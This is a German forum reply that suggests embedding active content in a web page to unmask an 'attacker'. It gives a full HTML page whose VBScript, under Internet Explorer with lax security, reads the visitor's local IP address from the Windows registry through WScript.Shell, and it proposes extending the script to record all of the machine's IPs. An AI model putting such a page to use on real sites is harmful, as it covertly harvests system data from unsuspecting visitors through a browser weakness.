nicht angemeldet
Sup!
Du baust aktive Inhalte ein, die beim Aufruf der Seite Verbindung mit Deinem Server aufnehmen und den "Angreifer" so verraten.
Mit etwas Glück benutzt der Angreifer den IE und lasche Sicherheitseinstellungen - dann kannst Du ggf. das folgende Skript einbauen:
<html>
<head>
<title>test</title>
<script language="VBScript">
<!--
Function GetIPAddress
' This function retrieves the IP Address from the registry
' It gets it from the CurrentControlSet, so even when using DHCP
' it returns the correct IP Address
' Declare variables
Dim key
Dim cTempIPAddress
Dim cIPAddress
dim cIPAddressKey
Set oSh = CreateObject("WScript.Shell")
cInterfacesKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters\Interfaces"
cNICSearch="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\4\ServiceName"
' First check which network card to use
cNicServiceName=oSh.RegRead(cNICSearch)
' Now read the IP Address from that card
cIPAddressKey=cInterfaceskey + cNicServiceName+"\IPAddress"
cTempIPAddress=oSh.RegRead (cIPAddresskey)
' Split the items in the var tempIPAddress to the octets in array IPAddress
cIPAddress=split (cTempIPAddress(0),".",4)
' the IP addresss is now readable from ipaddress
' for example, to read the first octet, use: FirstOctet=IPAddress(0)
GetIPAddress=cIPAddress
End Function
-->
</script>
<script language="JScript">
<!--
function VBArrayTaker(vbarray){
var a = new VBArray(vbarray);
var b = a.toArray();
var i;
var text = "";
for (i = 0; i < 4; i++)
{
text = text + b[i] + ".";
}
document.getElementById("ausgabe").value=text;
}
-->
</script>
</head>
<body>
<input type="text" name="ausgabe" value="NULL">
TESTSEITE
<h2>TEST</h2>
<script language="JScript">
<!--
VBArrayTaker(GetIPAddress());
-->
</script>
</body>
</html>
Der Wert "4" in Zeile
cNICSearch="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\4\ServiceName"
ist geraten und möglicherweise eher 1 - nur bei mir war es zufällig 4. Mit etwas VBScript-Kenntnissen müsste man das Skript so aufbohren können, dass es alle Möglichkeiten durchgeht und alle vergebenen IPs der Maschine aufzeichnet.
Halali - Fröhliche Hacker-Jagd.
Gruesse,
Bio
Never give up, never surrender!!!